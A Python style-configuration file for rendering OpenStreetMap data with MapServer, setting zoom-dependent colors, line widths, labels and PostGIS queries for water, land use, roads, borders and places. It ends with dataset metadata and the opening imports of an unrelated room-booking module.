-*-\n\nlayer_suffixes = {\n 0: 0,\n 1: 1,\n 2: 2,\n 3: 3,\n 4: 4,\n 5: 5,\n 6: 6,\n 7: 7,\n 8: 8,\n 9: 9,\n 10: 10,\n 11: 11,\n 12: 12,\n 13: 13,\n 14: 14,\n 15: 15,\n 16: 16,\n 17: 17,\n 18: 18\n}\n\nmaxscales = {\n 0: 99999999999,\n 1: 332808204,\n 2: 166404102,\n 3: 83202051,\n 4: 41601025,\n 5: 20800512,\n 6: 10400256,\n 7: 5200128,\n 8: 2600064,\n 9: 1300032,\n 10: 650016,\n 11: 325008,\n 12: 162504,\n 13: 81252,\n 14: 40626,\n 15: 20313,\n 16: 10156,\n 17: 5078,\n 18: 2539\n}\n\nminscales = {\n 0: 332808204,\n 1: 166404102,\n 2: 83202051,\n 3: 41601025,\n 4: 20800512,\n 5: 10400256,\n 6: 5200128,\n 7: 2600064,\n 8: 1300032,\n 9: 650016,\n 10: 325008,\n 11: 162504,\n 12: 81252,\n 13: 40626,\n 14: 20313,\n 15: 10156,\n 16: 5078,\n 17: 2539,\n 18: 0\n}\n\ndefault = {\n 'layer_suffix': layer_suffixes,\n 'maxscale': maxscales,\n 'minscale': minscales,\n\n 'land_clr': '\"#E8E6E1\"',\n 'land_data': {\n 0: '\"data/simplified_land_polygons\"',\n 9: '\"data/land_polygons\"'\n },\n 'land_epsg': {\n 0: '\"init=epsg:3857\"',\n },\n\n ##### water #####\n 
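# NOTE: sources switch with zoom level - generalized gen0/gen1 tables at low\n    # zooms, full-resolution tables from zoom 12 upward.\n    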
'waterarea_data': {\n 0: '\"geometry from (select geometry,osm_id ,OSM_NAME_COLUMN as name,type from OSM_PREFIX_waterareas_gen0) as foo using unique osm_id using srid=OSM_SRID\"',\n 9: '\"geometry from (select geometry,osm_id ,OSM_NAME_COLUMN as name,type from OSM_PREFIX_waterareas_gen1) as foo using unique osm_id using srid=OSM_SRID\"',\n 12: '\"geometry from (select geometry,osm_id ,OSM_NAME_COLUMN as name,type from OSM_PREFIX_waterareas) as foo using unique osm_id using srid=OSM_SRID\"'\n },\n 'display_waterarea_lbl' : {\n 0: 0,\n 6: 1\n },\n 'waterarea_clr': '\"#B3C6D4\"',\n 'waterarea_ol_clr': '\"#B3C6D4\"',\n 'waterarea_ol_width': 0,\n 'waterarea_font': \"sc\",\n 'waterarea_lbl_size': 8,\n 'waterarea_lbl_clr': '\"#6B94B0\"',\n 'waterarea_lbl_ol_clr': \"255 255 255\",\n 'waterarea_lbl_ol_width': 2,\n 'ocean_clr': '\"#B3C6D4\"',\n\n 'display_waterways': {\n 0: 0,\n 6: 1\n },\n 'waterways_data': {\n 0: '\"geometry from (select geometry,osm_id,type,OSM_NAME_COLUMN as name from OSM_PREFIX_waterways_gen0 where type=\\'river\\') as foo using unique osm_id using srid=OSM_SRID\"',\n 9: '\"geometry from (select geometry,osm_id,type,OSM_NAME_COLUMN as name from OSM_PREFIX_waterways_gen1 where type=\\'river\\') as foo using unique osm_id using srid=OSM_SRID\"',\n 12: '\"geometry from (select geometry,osm_id,type,OSM_NAME_COLUMN as name from OSM_PREFIX_waterways) as foo using unique osm_id using srid=OSM_SRID\"'\n },\n\n 'canal_width': {\n 0: 0,\n 10: 0.5,\n 12: 1,\n 14: 2,\n 15: 4,\n 16: 8,\n 17: 16,\n 18: 30\n },\n 'display_canal_lbl' : {\n 0: 0,\n 10: 1\n },\n 'canal_clr': '\"#B3C6D4\"',\n 'canal_font': \"sc\",\n 'canal_lbl_size': 8,\n 'canal_lbl_clr': '\"#6B94B0\"',\n 'canal_lbl_ol_clr': \"255 255 255\",\n 'canal_lbl_ol_width': 2,\n\n 'stream_width': {\n 0: 0,\n 10: 0.5,\n 12: 1,\n 14: 2\n },\n 'display_stream_lbl' : {\n 0: 0, 12: 1\n },\n 'stream_clr': '\"#B3C6D4\"',\n 'stream_font': \"sc\",\n 'stream_lbl_size': 8,\n 'stream_lbl_clr': '\"#6B94B0\"',\n 'stream_lbl_ol_clr': \"255 255 255\",\n 'stream_lbl_ol_width': 2,\n\n 'river_width': {\n 0: 0,\n 6: 0.15,\n 7: 0.25,\n 8: 0.5,\n 9: 1,\n 11: 2,\n 13: 3,\n 15: 4,\n 16: 5,\n 17: 6,\n 18: 7\n },\n 'display_river_lbl' : {\n 0: 0,\n 6: 1\n },\n 'river_clr': '\"#B3C6D4\"',\n 'river_font': \"sc\",\n 'river_lbl_size': {\n 0: 8,\n 15: 9,\n 17: 10\n },\n 'river_lbl_clr': '\"#6B94B0\"',\n 'river_lbl_ol_clr': \"255 255 255\",\n 'river_lbl_ol_width': 2,\n\n ##### landusage ######\n 'display_landusage': {\n 0: 0,\n 4: 1\n },\n\n 'landusage_data': {\n 0: '\"geometry from (select geometry,osm_id,type,OSM_NAME_COLUMN as name from OSM_PREFIX_landusages_gen00) as foo using unique osm_id using srid=OSM_SRID\"',\n 6: '\"geometry from (select geometry,osm_id,type,OSM_NAME_COLUMN as name from OSM_PREFIX_landusages_gen0) as foo using unique osm_id using srid=OSM_SRID\"',\n 9: '\"geometry from (select geometry ,osm_id, type, OSM_NAME_COLUMN as name from OSM_PREFIX_landusages_gen1 where type in (\\'forest\\',\\'wood\\',\\'farmland\\',\\'orchard\\',\\'vineyard\\',\\'plant_nursery\\',\\'grass\\',\\'grassland\\',\\'meadow\\',\\'scrub\\'\\'industrial\\',\\'commercial\\',\\'residential\\')) as foo using unique osm_id using srid=OSM_SRID\"',\n 10: '\"geometry from (select geometry ,osm_id, type, OSM_NAME_COLUMN as name from OSM_PREFIX_landusages_gen1 where type in 
(\\'forest\\',\\'wood\\',\\'farmland\\',\\'orchard\\',\\'vineyard\\',\\'plant_nursery\\',\\'grass\\',\\'grassland\\',\\'meadow\\',\\'village_green\\',\\'garden\\',\\'pedestrian\\',\\'cemetery\\',\\'industrial\\',\\'commercial\\',\\'brownfield\\',\\'residential\\',\\'school\\',\\'college\\',\\'university\\',\\'military\\',\\'park\\',\\'golf_course\\',\\'heath\\',\\'scrub\\',\\'hospital\\',\\'parking\\',\\'stadium\\',\\'sports_center\\',\\'pitch\\') order by area desc) as foo using unique osm_id using srid=OSM_SRID\"',\n 12: '\"geometry from (select geometry ,osm_id, type, OSM_NAME_COLUMN as name from OSM_PREFIX_landusages where type in (\\'forest\\',\\'wood\\',\\'farmland\\',\\'orchard\\',\\'vineyard\\',\\'plant_nursery\\',\\'grass\\',\\'grassland\\',\\'meadow\\',\\'village_green\\',\\'garden\\',\\'pedestrian\\',\\'cemetery\\',\\'industrial\\',\\'commercial\\',\\'brownfield\\',\\'residential\\',\\'school\\',\\'college\\',\\'university\\',\\'military\\',\\'park\\',\\'golf_course\\',\\'heath\\',\\'scrub\\',\\'hospital\\',\\'parking\\',\\'stadium\\',\\'sports_center\\',\\'pitch\\') order by area desc) as foo using unique osm_id using srid=OSM_SRID\"'\n },\n\n 'industrial_clr': '\"#d1d1d1\"',\n 'industrial_ol_clr': '\"#d1d1d1\"',\n 'industrial_ol_width': 0,\n 'display_industrial_lbl' : {\n 0: 0,\n 11: 1\n },\n 'industrial_font': \"sc\",\n 'industrial_lbl_size': 8,\n 'industrial_lbl_clr': '0 0 0',\n 'industrial_lbl_ol_clr': \"255 255 255\",\n 'industrial_lbl_ol_width': 2,\n\n 'display_residential': 1,\n 'residential_clr': '\"#E3DED4\"',\n 'residential_ol_clr': '\"#E3DED4\"',\n 'residential_ol_width': 0,\n 'display_residential_lbl' : {\n 0: 0,\n 12: 1\n },\n 'residential_font': \"sc\",\n 'residential_lbl_size': 8,\n 'residential_lbl_clr': '0 0 0',\n 'residential_lbl_ol_clr': \"255 255 255\",\n 'residential_lbl_ol_width': 2,\n\n 'park_clr': '\"#DCDCB4\"',\n 'display_park_lbl' : {0: 0, 11:1},\n 'park_font': \"sc\",\n 'park_lbl_size': 8,\n 'park_lbl_clr': '0 0 0',\n 'park_lbl_ol_clr': \"255 255 255\",\n 'park_lbl_ol_width': 2,\n\n 'hospital_clr': '\"#E6C8C3\"',\n 'display_hospital_lbl' : {0: 0, 12:1},\n 'hospital_font': \"sc\",\n 'hospital_lbl_size': 8,\n 'hospital_lbl_clr': '0 0 0',\n 'hospital_lbl_ol_clr': \"255 255 255\",\n 'hospital_lbl_ol_width': 2,\n\n 'education_clr': '\"#DED1AB\"',\n 'display_education_lbl' : {0: 0, 12:1},\n 'education_font': \"sc\",\n 'education_lbl_size': 8,\n 'education_lbl_clr': '0 0 0',\n 'education_lbl_ol_clr': \"255 255 255\",\n 'education_lbl_ol_width': 2,\n\n 'sports_clr': '\"#DED1AB\"',\n 'display_sports_lbl' : {0: 0, 12:1},\n 'sports_font': \"sc\",\n 'sports_lbl_size': 8,\n 'sports_lbl_clr': '0 0 0',\n 'sports_lbl_ol_clr': \"255 255 255\",\n 'sports_lbl_ol_width': 2,\n\n 'cemetery_clr': '\"#d1d1d1\"',\n 'display_cemetery_lbl' : {0: 0, 12:1},\n 'cemetery_font': \"sc\",\n 'cemetery_lbl_size': 8,\n 'cemetery_lbl_clr': '0 0 0',\n 'cemetery_lbl_ol_clr': \"255 255 255\",\n 'cemetery_lbl_ol_width': 2,\n\n 'forest_clr': '\"#C2D1B2\"',\n 'display_forest_lbl' : {0: 0, 12:1},\n 'forest_font': \"sc\",\n 'forest_lbl_size': 8,\n 'forest_lbl_clr': '0 0 0',\n 'forest_lbl_ol_clr': \"255 255 255\",\n 'forest_lbl_ol_width': 2,\n\n 'display_farmland': {0: 0},\n 'farmland_clr': '\"#eef0d5\"',\n\n 'display_grasses': {0: 0},\n 'grass_clr': '\"#cdebb0\"',\n 'display_grass_lbl' : {0: 0, 11:1},\n 'grass_font': \"sc\",\n 'grass_lbl_size': 8,\n 'grass_lbl_clr': '0 0 0',\n 'grass_lbl_ol_clr': \"255 255 255\",\n 'grass_lbl_ol_width': 2,\n\n 'display_orchard': {0: 0},\n 'orchard_clr': 
'\"#aedfa3\"',\n\n 'display_transport_areas' : {\n 0: 0,\n 11: 1\n },\n 'transport_clr': '200 200 200',\n 'display_transport_lbl' : {\n 0: 0,\n 12:1\n },\n 'transport_font': \"sc\",\n 'transport_lbl_size': 8,\n 'transport_lbl_clr': '0 0 0',\n 'transport_lbl_ol_clr': \"255 255 255\",\n 'transport_lbl_ol_width': 2,\n\n ###### highways #######\n\n 'roads_data': {\n 0: '\"geometry from (select osm_id,geometry,OSM_NAME_COLUMN as name,ref,type from OSM_PREFIX_roads_gen0 where type in (\\'trunk\\',\\'motorway\\') order by z_order asc) as foo using unique osm_id using srid=OSM_SRID\"',\n 8: '\"geometry from (select osm_id,geometry,OSM_NAME_COLUMN as name,ref,type from OSM_PREFIX_roads_gen1 where type in (\\'trunk\\',\\'motorway\\',\\'primary\\') order by z_order asc) as foo using unique osm_id using srid=OSM_SRID\"',\n 9: '\"geometry from (select osm_id,geometry,OSM_NAME_COLUMN as name,ref,type from OSM_PREFIX_roads_gen1 where type in (\\'secondary\\',\\'trunk\\',\\'motorway\\',\\'primary\\') order by z_order asc) as foo using unique osm_id using srid=OSM_SRID\"',\n 10: '\"geometry from (select osm_id,geometry,OSM_NAME_COLUMN as name,ref,type from OSM_PREFIX_roads_gen1 ) as foo using unique osm_id using srid=OSM_SRID\"',\n 11: '\"geometry from (select osm_id,geometry,OSM_NAME_COLUMN as name,ref,type from OSM_PREFIX_roads order by z_order asc) as foo using unique osm_id using srid=OSM_SRID\"',\n 14: '\"geometry from (select osm_id,geometry,OSM_NAME_COLUMN as name,ref,type||bridge||tunnel as type from OSM_PREFIX_roads order by z_order asc, st_length(geometry) asc) as foo using unique osm_id using srid=OSM_SRID\"',\n },\n\n 'tunnel_opacity': 40,\n\n 'display_bridges': { #also activates tunnels\n 0: 0,\n 14: 1\n },\n 'motorway_bridge_clr': '136 136 136',\n 'motorway_bridge_width': {\n 0: 0.5,\n 14: 1\n },\n 'trunk_bridge_clr': '136 136 136',\n 'trunk_bridge_width': {\n 0: 0.5,\n 14: 1\n },\n 'primary_bridge_clr': '136 136 136',\n 'primary_bridge_width': {\n 0: 0.5,\n 14: 1\n },\n 'secondary_bridge_clr': '136 136 136',\n 'secondary_bridge_width': {\n 0: 0.5,\n 14: 1\n },\n 'tertiary_bridge_clr': '136 136 136',\n 'tertiary_bridge_width': {\n 0: 0.5,\n 14: 1\n },\n 'other_bridge_clr': '136 136 136',\n 'other_bridge_width': {\n 0: 0.5,\n 14: 1\n },\n 'pedestrian_bridge_clr': '136 136 136',\n 'pedestrian_bridge_width': {\n 0: 0.5,\n 14: 1\n },\n\n 'display_highways': {\n 0: 0,\n 5: 1\n },\n\n 'display_motorways': {\n 0: 0,\n 5: 1\n },\n 'display_motorway_links': {\n 0: 0,\n 9: 1\n },\n 'display_motorway_outline': 0,\n 'motorway_clr': '255 255 255',\n 'motorway_width': {\n 0: 0.5,\n 8: 1,\n 9: 2,\n 11: 3,\n 12: 4,\n 14: 5,\n 15: 6,\n 16: 8,\n 17: 9,\n 18: 10\n },\n 'label_motorways': {\n 0: 0,\n 10: 1\n },\n 'motorway_font': \"scb\",\n 'motorway_lbl_size': {\n 0: 8,\n 14: 9\n },\n 'motorway_lbl_clr': '\"#555555\"',\n 'motorway_ol_width': {\n 0: 0.5,\n 10: 1\n },\n 'motorway_ol_clr': \"100 100 100\",\n\n 'display_trunks': {\n 0: 0,\n 5: 1\n },\n 'display_trunk_links': {\n 0: 0,\n 9: 1\n },\n 'display_trunk_outline': 0,\n 'trunk_clr': '255 255 255',\n 'trunk_width': {\n 0: 0.5,\n 8: 1,\n 9: 2,\n 11: 3,\n 12: 4,\n 14: 5,\n 15: 6,\n 16: 8,\n 17: 9,\n 18: 10\n },\n 'label_trunks': {\n 0: 0,\n 10: 1\n },\n 'trunk_font': \"scb\",\n 'trunk_lbl_size': {\n 0: 8,\n 14: 9\n },\n 'trunk_lbl_clr': '\"#555555\"',\n 'trunk_ol_width': {\n 0: 0.5,\n 10: 1\n },\n 'trunk_ol_clr': \"100 100 100\",\n\n 'display_primaries': {\n 0: 0,\n 8: 1\n },\n 'display_primary_outline': 0,\n 'primary_clr': {\n 0: '\"#aaaaaa\"',\n 9: 
'\"#ffffff\"'\n },\n 'primary_width': {\n 0: 0.5,\n 9: 0.75,\n 10: 1,\n 11: 1.5,\n 12: 2,\n 13: 2.5,\n 14: 3,\n 15: 4,\n 16: 7,\n 17: 8,\n 18: 9\n },\n 'label_primaries': {\n 0: 0,\n 13: 1\n },\n 'primary_font': \"sc\",\n 'primary_lbl_size': {\n 0: 0,\n 13: 8,\n 15: 9\n },\n 'primary_lbl_clr': {\n 0: '\"#333333\"'\n },\n 'primary_lbl_ol_clr': {\n 0: '255 255 255'\n },\n 'primary_lbl_ol_width': 2,\n 'primary_ol_width': 1,\n 'primary_ol_clr': \"0 0 0\",\n\n 'display_secondaries': {\n 0: 0,\n 9: 1\n },\n 'display_secondary_outline': 0,\n 'secondary_clr': {\n 0: '\"#aaaaaa\"',\n 10: '\"#ffffff\"'\n },\n 'secondary_width': {\n 0: 0,\n 9: 0.5,\n 10: 0.75,\n 11: 1,\n 12: 1.5,\n 13: 2,\n 14: 2.5,\n 15: 3.5,\n 16: 6,\n 17: 7,\n 18: 8\n },\n 'label_secondaries': {\n 0: 0,\n 13: 1\n },\n 'secondary_font': \"sc\",\n 'secondary_lbl_size': {\n 0: 0,\n 13: 8,\n 15: 9\n },\n 'secondary_lbl_clr': '\"#333333\"',\n 'secondary_lbl_ol_clr': '255 255 255',\n 'secondary_lbl_ol_width': 2,\n 'secondary_ol_width': 1,\n 'secondary_ol_clr': \"0 0 0\",\n\n 'display_tertiaries': {\n 0: 0,\n 10: 1\n },\n 'display_tertiary_outline': 0,\n 'tertiary_clr': {\n 0: '\"#aaaaaa\"',\n 13: '\"#ffffff\"'\n },\n 'tertiary_width': {\n 0: 0,\n 10: 0.5,\n 11: 0.75,\n 12: 1,\n 13: 1.5,\n 14: 2,\n 15: 2.5,\n 16: 5,\n 17: 6,\n 18: 7\n },\n 'label_tertiaries': {\n 0: 0,\n 15: 1\n },\n 'tertiary_font': \"sc\",\n 'tertiary_lbl_size': {\n 0: 0,\n 15: 8,\n },\n 'tertiary_lbl_clr': '\"#333333\"',\n 'tertiary_lbl_ol_clr': '255 255 255',\n 'tertiary_lbl_ol_width': 2,\n 'tertiary_ol_width': 1,\n 'tertiary_ol_clr': \"0 0 0\",\n\n 'display_other_roads': {\n 0: 0,\n 11: 1\n },\n 'display_other_outline': 0,\n 'other_clr': {\n 0: '\"#aaaaaa\"',\n 15: '\"#ffffff\"'\n },\n 'other_width': {\n 0: 0,\n 11: 0.5,\n 12: 0.75,\n 13: 1,\n 14: 1.5,\n 15: 2,\n 16: 4,\n 17: 5,\n 18: 6,\n },\n 'label_other_roads': {\n 0: 0,\n 15: 1\n },\n 'other_font': \"sc\",\n 'other_lbl_size': {\n 0: 0,\n 15: 8,\n },\n 'other_lbl_clr': '\"#333333\"',\n 'other_lbl_ol_clr': '255 255 255',\n 'other_lbl_ol_width': 2,\n 'other_ol_width': 1,\n 'other_ol_clr': \"0 0 0\",\n\n 'display_pedestrian': {\n 0: 0,\n 12: 1\n },\n 'display_pedestrian_outline': 0,\n 'pedestrian_clr': '\"#f2f2ed\"',\n 'pedestrian_width': {\n 0: 0,\n 11: 0.5,\n 12: 0.75,\n 13: 1,\n 14: 1.5,\n 15: 2,\n 16: 2.5,\n 17: 3,\n 18: 3.5,\n },\n 'label_pedestrian': {\n 0: 0,\n 15: 1\n },\n 'display_pedestrian_lbl': {\n 0: 0,\n 12: 1\n },\n 'pedestrian_font': \"sc\",\n 'pedestrian_lbl_size': {\n 0: 0,\n 15: 8,\n },\n 'pedestrian_lbl_clr': '\"#333333\"',\n 'pedestrian_lbl_ol_clr': '255 255 255',\n 'pedestrian_lbl_ol_width': 2,\n 'pedestrian_ol_width': 1,\n 'pedestrian_ol_clr': \"0 0 0\",\n\n 'display_tracks': {\n 0: 0,\n 12: 1\n },\n 'display_track_outline': 0,\n 'track_clr': {\n 0: '\"#aaaaaa\"',\n 15: '\"#ffffff\"',\n },\n 'track_width': {\n 0: 0,\n 11: 0.5,\n 12: 0.75,\n 15: 1,\n },\n 'track_pattern': {\n 0: '2 2',\n 15: '2 3'\n },\n 'label_track': {\n 0: 0,\n 15: 1\n },\n 'track_font': \"sc\",\n 'track_lbl_size': {\n 0: 0,\n 15: 8,\n },\n 'track_lbl_clr': '\"#333333\"',\n 'track_lbl_ol_clr': '255 255 255',\n 'track_lbl_ol_width': 2,\n 'track_ol_width': 1,\n 'track_ol_clr': \"0 0 0\",\n\n 'display_footways': {\n 0: 0,\n 15: 1\n },\n 'display_footway_outline': 0,\n 'footway_clr': {\n 0: '\"#aaaaaa\"',\n 15: '\"#ffffff\"',\n },\n 'footway_width': {\n 0: 0,\n 15: 1,\n },\n 'footway_pattern': '2 3',\n 'footway_ol_width': 1,\n 'footway_ol_clr': \"0 0 0\",\n\n ###### railways ########\n 'display_railways': {\n 0: 0,\n 8: 1\n 
},\n 'railway_clr': '\"#777777\"',\n 'railway_width': {\n 0: 0.5,\n 10: 1\n },\n 'railway_ol_clr': '\"#777777\"',\n 'railway_ol_width': 0,\n 'railway_pattern': '2 2',\n 'railway_tunnel_opacity': 40,\n 'railways_data': {\n 0: '\"geometry from (select geometry,osm_id,tunnel from OSM_PREFIX_railways_gen0 where type=\\'rail\\') as foo using unique osm_id using srid=OSM_SRID\"',\n 6: '\"geometry from (select geometry,osm_id,tunnel from OSM_PREFIX_railways_gen1 where type=\\'rail\\') as foo using unique osm_id using srid=OSM_SRID\"',\n 12: '\"geometry from (select geometry,osm_id,tunnel from OSM_PREFIX_railways where type=\\'rail\\') as foo using unique osm_id using srid=OSM_SRID\"'\n },\n\n\n ##### borders ######\n 'border_data': '\"data/boundaries.shp\"',\n 'border_epsg': {\n 0: '\"init=epsg:4326\"'\n },\n\n 'display_border_2': {\n 0: 1\n },\n 'display_border_2_outer': {\n 0: 0,\n 6: 1\n },\n 'border_2_clr': {\n 0: '\"#CDCBC6\"'\n },\n 'border_2_width': {\n 0: '5'\n },\n 'border_2_inner_clr': {\n 0: '\"#CDCBC6\"',\n 4: '\"#8d8b8d\"'\n },\n 'border_2_inner_width': {\n 0: '0.5',\n 7: '1'\n },\n 'border_2_inner_pattern': {\n 0: ''\n },\n # 'display_border_4': {\n # 0: 0,\n # 6: 1\n # },\n # 'display_border_4_outer': {\n # 0: 0,\n # 7: 1\n # },\n # 'border_4_clr': {\n # 0: '\"#CDCBC6\"'\n # },\n # 'border_4_width': {\n # 0: '5',\n # 8: '6'\n # },\n # 'border_4_inner_clr': {\n # 0: '\"#8d8b8d\"'\n # },\n # 'border_4_inner_width': {\n # 0: '0.5',\n # 7: '1'\n # },\n # 'border_4_inner_pattern': {\n # 0: '',\n # 7: 'PATTERN 2 2 END'\n # },\n # 'display_border_6': {\n # 0: 0,\n # 7: 1\n # },\n # 'display_border_6_outer': {\n # 0: 0,\n # 9: 1\n # },\n # 'border_6_clr': {\n # 0: '\"#CDCBC6\"'\n # },\n # 'border_6_width': {\n # 0: '5',\n # 13: '7'\n # },\n # 'border_6_inner_clr': {\n # 0: '\"#8d8b8d\"'\n # },\n # 'border_6_inner_width': {\n # 0: '0.5',\n # 9: 1\n # },\n # 'border_6_inner_pattern': {\n # 0: '',\n # 9: 'PATTERN 2 2 END'\n # },\n # 'display_border_8': {\n # 0: 0,\n # 11: 1\n # },\n # 'display_border_8_outer': {\n # 0: 0,\n # 13: 1\n # },\n # 'border_8_clr': {\n # 0: '\"#CDCBC6\"'\n # },\n # 'border_8_width': {\n # 0: '5'\n # },\n # 'border_8_inner_clr': {\n # 0: '\"#8d8b8d\"'\n # },\n # 'border_8_inner_width': {\n # 0: '0.5',\n # 14: '1'\n # },\n # 'border_8_inner_pattern': {\n # 0: '',\n # 13: 'PATTERN 2 2 END'\n # },\n\n\n ###### buildings ######\n 'display_buildings': {\n 0: 0,\n 15: 1\n },\n 'building_clr': '\"#bbbbbb\"',\n 'building_ol_clr': '\"#333333\"',\n 'building_ol_width': {\n 0: 0,\n 16: 0.1,\n 17: 0.5\n },\n 'building_font': \"sc\",\n 'building_lbl_clr': \"0 0 0\",\n 'building_lbl_size': 8,\n 'building_lbl_ol_clr': \"255 255 255\",\n 'building_lbl_ol_width': 2,\n 'label_buildings': {\n 0: 0,\n 15: 1\n },\n\n 'display_housenumbers': {\n 0: 0,\n 18: 1\n },\n 'housenumbers_font': \"sc\",\n 'housenumbers_lbl_clr': '\"#808080\"',\n 'housenumbers_lbl_size': 8,\n 'housenumbers_lbl_ol_clr': \"255 255 255\",\n 'housenumbers_lbl_ol_width': 1,\n\n\n ####### aeroways #######\n 'display_aeroways': {\n 0: 0,\n 10: 1\n },\n 'runway_clr': \"180 180 180\",\n 'runway_width': {\n 0: 1,\n 11: 2,\n 12: 3,\n 13: 5,\n 14: 7,\n 15: 11,\n 16: 15,\n 17: 19,\n 18: 23\n },\n 'runway_center_clr': '80 80 80',\n 'runway_center_width': {\n 0: 0,\n 15: 1\n },\n 'runway_center_pattern' : '2 2',\n 'taxiway_width': {\n 0: 0,\n 10: 0.2,\n 13: 1,\n 14: 1.5,\n 15: 2,\n 16: 3,\n 17: 4,\n 18: 5\n },\n 'taxiway_clr': \"180 180 180\",\n\n ###### places ######\n 'places_data': {\n 0: '\"geometry from (select * from 
OSM_PREFIX_places where type in (\\'country\\',\\'continent\\') and OSM_NAME_COLUMN is not NULL order by population asc nulls first) as foo using unique osm_id using srid=OSM_SRID\"',\n 3: '\"geometry from (select * from OSM_PREFIX_places where type in (\\'country\\',\\'continent\\',\\'city\\') and OSM_NAME_COLUMN is not NULL order by population asc nulls first) as foo using unique osm_id using srid=OSM_SRID\"',\n 8: '\"geometry from (select * from OSM_PREFIX_places where type in (\\'city\\',\\'town\\') and OSM_NAME_COLUMN is not NULL order by population asc nulls first) as foo using unique osm_id using srid=OSM_SRID\"',\n 11: '\"geometry from (select * from OSM_PREFIX_places where type in (\\'city\\',\\'town\\',\\'village\\') and OSM_NAME_COLUMN is not NULL order by population asc nulls first) as foo using unique osm_id using srid=OSM_SRID\"',\n 13: '\"geometry from (select * from OSM_PREFIX_places where OSM_NAME_COLUMN is not NULL order by population asc nulls first) as foo using unique osm_id using srid=OSM_SRID\"',\n },\n 'display_capitals': 0,\n 'display_capital_symbol': {\n 0: 1,\n 10: 0\n },\n 'capital_lbl_size': {\n 0: 0,\n 3: 8,\n 8: 9,\n 10: 10,\n 13: 11,\n 15: 12\n\n },\n 'capital_size': 6,\n 'capital_fg_size': 2,\n 'capital_ol_clr': \"0 0 0\",\n 'capital_fg_clr': \"0 0 0\",\n 'capital_clr': \"255 0 0\",\n 'capital_font': \"sc\",\n 'capital_lbl_clr': \"0 0 0\",\n 'capital_lbl_ol_clr': \"255 255 255\",\n 'capital_lbl_ol_width': 2,\n\n 'display_continents': {\n 0: 1,\n 3: 0\n },\n 'continent_lbl_size': 8,\n 'continent_lbl_clr': \"100 100 100\",\n 'continent_lbl_ol_width': \"1\",\n 'continent_lbl_ol_clr': \"-1 -1 -1\",\n 'continent_font': \"scb\",\n\n 'display_countries': {\n 0: 0,\n 2: 1,\n 8: 0\n },\n 'country_lbl_size': 8,\n 'country_lbl_clr': \"100 100 100\",\n 'country_lbl_ol_width': 2,\n 'country_lbl_ol_clr': \"-1 -1 -1\",\n 'country_font': \"scb\",\n\n 'display_cities': {\n 0: 0,\n 3: 1,\n 16: 0\n },\n 'display_city_symbol': {\n 0: 1,\n 10: 0\n },\n 'city_lbl_size': {\n 0: 0,\n 3: 8,\n 8: 9,\n 10: 10,\n 11: 11,\n 13: 12,\n 15: 13\n },\n 'city_size': {\n 0: 5,\n 8: 6\n },\n 'city_ol_clr': \"0 0 0\",\n 'city_clr': {\n 0: \"200 200 200\",\n 8: \"255 255 255\"\n },\n 'city_font': \"sc\",\n 'city_lbl_clr': {\n 0: \"68 68 68\",\n 8: '0 0 0'\n },\n 'city_lbl_ol_clr': \"255 255 255\",\n 'city_lbl_ol_width': {\n 0: 2,\n 10: 3\n },\n\n 'display_towns': {\n 0: 0,\n 8: 1\n },\n 'display_town_symbol': {\n 0: 1,\n 12: 0\n },\n 'town_font': \"sc\",\n 'town_lbl_clr': {\n 0: '\"#666666\"',\n 11: '0 0 0'\n },\n 'town_lbl_ol_clr': \"255 255 255\",\n 'town_lbl_ol_width': 2,\n 'town_lbl_size': {\n 0: 0,\n 8: 8,\n 10: 9,\n 12: 10,\n 15: 11\n },\n 'town_size': {\n 0: 0,\n 8: 3,\n 10: 5\n },\n 'town_ol_clr': \"0 0 0\",\n 'town_clr': \"200 200 200\",\n\n 'display_suburbs': {\n 0: 0,\n 13: 1\n },\n 'suburb_font': \"sc\",\n 'suburb_lbl_clr': {\n 0: '\"#444444\"',\n 15: '0 0 0'\n },\n 'suburb_lbl_ol_clr': \"255 255 255\",\n 'suburb_lbl_ol_width': 2,\n 'display_suburb_symbol': 0,\n 'suburb_lbl_size': {\n 0: 0,\n 13: 8,\n 15: 9,\n },\n 'suburb_size': 5,\n 'suburb_ol_clr': \"0 0 0\",\n 'suburb_clr': \"200 200 200\",\n\n 'display_villages': {\n 0: 0,\n 12: 1\n },\n 'display_village_symbol': {\n 0: 1,\n 14: 0\n },\n 'village_lbl_size': {\n 0: 0,\n 10: 8,\n 13: 9,\n 15: 10\n },\n 'village_size': {\n 0: 0,\n 11: 3,\n 13: 4\n },\n 'village_ol_clr': \"0 0 0\",\n 'village_clr': \"200 200 200\",\n 'village_font': \"sc\",\n 'village_lbl_clr': {\n 0: '\"#444444\"',\n 13: '0 0 0'\n },\n 'village_lbl_ol_clr': \"255 
255 255\",\n 'village_lbl_ol_width': 2,\n\n 'display_hamlets': {\n 0: 0,\n 13: 1\n },\n 'hamlet_font': \"sc\",\n 'hamlet_lbl_clr': {\n 0: '\"#444444\"',\n 15: '0 0 0'\n },\n 'hamlet_lbl_ol_clr': \"255 255 255\",\n 'hamlet_lbl_ol_width': 2,\n 'display_hamlet_symbol': 0,\n 'hamlet_lbl_size': {\n 0: 0,\n 13: 8,\n 15: 9,\n },\n 'hamlet_size': 5,\n 'hamlet_ol_clr': \"0 0 0\",\n 'hamlet_clr': \"200 200 200\",\n\n 'display_localities': {\n 0: 0,\n 13: 1\n },\n 'locality_font': \"sc\",\n 'locality_lbl_clr': {\n 0: '\"#444444\"',\n 15: '0 0 0'\n },\n 'locality_lbl_ol_clr': \"255 255 255\",\n 'locality_lbl_ol_width': 2,\n 'display_locality_symbol': 0,\n 'locality_lbl_size': {\n 0: 0,\n 13: 8,\n 15: 9,\n },\n 'locality_size': 5,\n 'locality_ol_clr': \"0 0 0\",\n 'locality_clr': \"200 200 200\",\n}\n","sub_path":"styles/default.py","file_name":"default.py","file_ext":"py","file_size_in_byte":26665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"470231067","text":"\nfrom collections import defaultdict\nfrom datetime import date, datetime, time, timedelta\n\nimport dateutil\nfrom flask import flash, jsonify, redirect, request, session\nfrom werkzeug.datastructures import MultiDict\nfrom werkzeug.exceptions import Forbidden, NotFound\n\nfrom fossir.core.db import db\nfrom fossir.core.errors import fossirError, NoReportError\nfrom fossir.modules.rb import rb_settings\nfrom fossir.modules.rb.controllers import RHRoomBookingBase\nfrom fossir.modules.rb.forms.reservations import (BookingSearchForm, ModifyBookingForm, NewBookingConfirmForm,\n NewBookingCriteriaForm, NewBookingPeriodForm, NewBookingSimpleForm)\nfrom fossir.modules.rb.models.locations import Location\nfrom fossir.modules.rb.models.reservation_occurrences import ReservationOccurrence\nfrom fossir.modules.rb.models.reservations import 